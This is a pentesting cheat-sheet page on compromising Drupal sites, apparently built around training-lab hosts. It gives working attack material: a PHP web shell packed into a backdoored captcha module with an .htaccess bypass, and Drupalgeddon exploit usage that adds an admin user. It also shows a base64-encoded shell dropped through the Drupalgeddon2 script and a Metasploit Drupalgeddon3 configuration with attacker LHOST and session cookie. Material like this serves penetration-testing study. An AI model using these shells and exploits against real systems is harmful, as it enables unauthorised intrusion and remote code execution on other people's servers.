Skip to content

Pentesting Drupal

Drupal is written in PHP and supports using MySQL or PostgreSQL for the backend.

Important Drupal files and directories

A Drupal website can be identified in several ways, including by the header or footer message Powered by Drupal, the standard Drupal logo, the presence of a CHANGELOG.txt file or README.txt file, via the page source, or clues in the robots.txt file such as references to /node.

1
curl -s http://$target | grep Drupal

Another way to identify Drupal CMS is through nodes. Drupal indexes its content using nodes. A node can hold anything such as a blog post, poll, article, etc. The page URIs are usually of the form /node/<nodeid>.

Version

It does not work on all versions:

1
curl -s http://$target/CHANGELOG.txt | grep -m2 ""

1
droopescan scan drupal --url http://$target

Make sure to heck the CVE associated at: https://www.cvedetails.com/vulnerability-list/vendor_id-1367/product_id-2387/Drupal-Drupal.html

Users

Drupal supports three types of users by default:

  • Administrator: This user has complete control over the Drupal website.
  • Authenticated User: These users can log in to the website and perform operations such as adding and editing articles based on their permissions.
  • Anonymous: All website visitors are designated as anonymous. By default, these users are only allowed to read posts.

Leveraging the PHP Filter Module

Unlike some CMS', obtaining a shell on a Drupal host via the admin console is not as easy as just editing a PHP file found within a theme or uploading a malicious PHP script.

In older versions of Drupal (before version 8), it was possible to log in as an admin and enable the PHP filter module, which "Allows embedded PHP code/snippets to be evaluated." From here, we could tick the check box next to the module and scroll down to Save configuration. Next, we could go to Content --> Add content and create a Basic page.

From version 8 onwards, the PHP Filter module is not installed by default. To leverage this functionality, we would have to install the module ourselves.  Since we would be changing and adding something to the client's Drupal instance, we may want to check with them first. We'd start by downloading the most recent version of the module from the Drupal website.

1
wget https://ftp.drupal.org/files/projects/php-8.x-1.1.tar.gz

Once downloaded go to Administration > Reports > Available updates.

From here, click on Browse, select the file from the directory we downloaded it to, and then click Install.

Uploading a Backdoored Module

Drupal allows users with appropriate permissions to upload a new module. A backdoored module can be created by adding a shell to an existing module.

1. Download the archive and extract its contents.

1
2
wget --no-check-certificate  https://ftp.drupal.org/files/projects/captcha-8.x-1.2.tar.gz
tar xvf captcha-8.x-1.2.tar.gz

2. Create a PHP web shell with the contents:

1
2
3
<?php
system($_GET[fe8edbabc5c5c9b7b764504cd22b17af]);
?>

3. Next, we need to create a .htaccess file to give ourselves access to the folder. This is necessary as Drupal denies direct access to the /modules folder.

1
2
3
4
<IfModule mod_rewrite.c>
RewriteEngine On
RewriteBase /
</IfModule>

4. The configuration above will apply rules for the / folder when we request a file in /modules. Copy both of these files to the captcha folder and create an archive.

1
2
mv shell.php .htaccess captcha
tar cvf captcha.tar.gz captcha/

5. Assuming we have administrative access to the website, click on Manage and then Extend on the sidebar. Next, click on the + Install new module button, and we will be taken to the install page, such as http://drupal.inlanefreight.local/admin/modules/install Browse to the backdoored Captcha archive and click Install.

Drupalgeddon

CVE-2014-3704 known as Drupalgeddon, affects versions 7.0 up to 7.31 and was fixed in version 7.32. This was a pre-authenticated SQL injection flaw that could be used to upload a malicious form or create a new admin user.

Download from: https://www.exploit-db.com/exploits/34992

1
2
# Add an admin user named hacker with password pwnd 
python2.7 drupalgeddon.py -t http://target -u hacker -p pwnd

Once logged in as admin, try to obtain a shell.

Drupalgeddon2

CVE-2018-7600, also known as Drupalgeddon2, is a remote code execution vulnerability, which affects versions of Drupal prior to 7.58 and 8.5.1. The vulnerability occurs due to insufficient input sanitization during user registration, allowing system-level commands to be maliciously injected.

Download from: https://www.exploit-db.com/exploits/44448

1
python3 drupalgeddon2.py

We can check quickly with cURL and see that the hello.txt file was indeed uploaded.

1
curl -s http://drupal-dev.inlanefreight.local/hello.txt

Now let's modify the script to gain remote code execution by uploading a malicious PHP file.

1
echo '<?php system($_GET[fe8edbabc5c5c9b7b764504cd22b17af]);?>' | base64

Output:

1
PD9waHAgc3lzdGVtKCRfR0VUW2ZlOGVkYmFiYzVjNWM5YjdiNzY0NTA0Y2QyMmIxN2FmXSk7Pz4K

Next, let's replace the echo command in the exploit script with a command to write out our malicious PHP script.

1
echo "PD9waHAgc3lzdGVtKCRfR0VUW2ZlOGVkYmFiYzVjNWM5YjdiNzY0NTA0Y2QyMmIxN2FmXSk7Pz4K" | base64 -d | tee hello.php

Now, run the script:

1
python3 drupalgeddon2.py

And to get the reverse shell running, browse to:

1
http://drupal-dev.inlanefreight.local/hello.php?fe8edbabc5c5c9b7b764504cd22b17af=id

Drupalgeddon3

CVE-2018-7602, also known as Drupalgeddon3, is a remote code execution vulnerability that affects multiple versions of Drupal 7.x and 8.x. This flaw exploits improper validation in the Form API.

It requires a user to have the ability to delete a node. We can exploit this using Metasploit, but we must first log in and obtain a valid session cookie. Once we have the session cookie, we can set up the exploit module as follows.

1
2
3
4
5
6
7
8
9
msfconsole -q
use multi/http/drupal_drupageddon3
set rhosts 10.129.42.195
set VHOST drupal-acc.inlanefreight.local
set drupal_session SESS45ecfcb93a827c3e578eae161f280548=jaAPbanr2KhLkLJwo69t0UOkn2505tXCaEdu33ULV2Y
set DRUPAL_NODE 1
set LHOST 10.10.14.15
show options
run
Last update: 2025-02-05
Created: February 2, 2025 19:49:43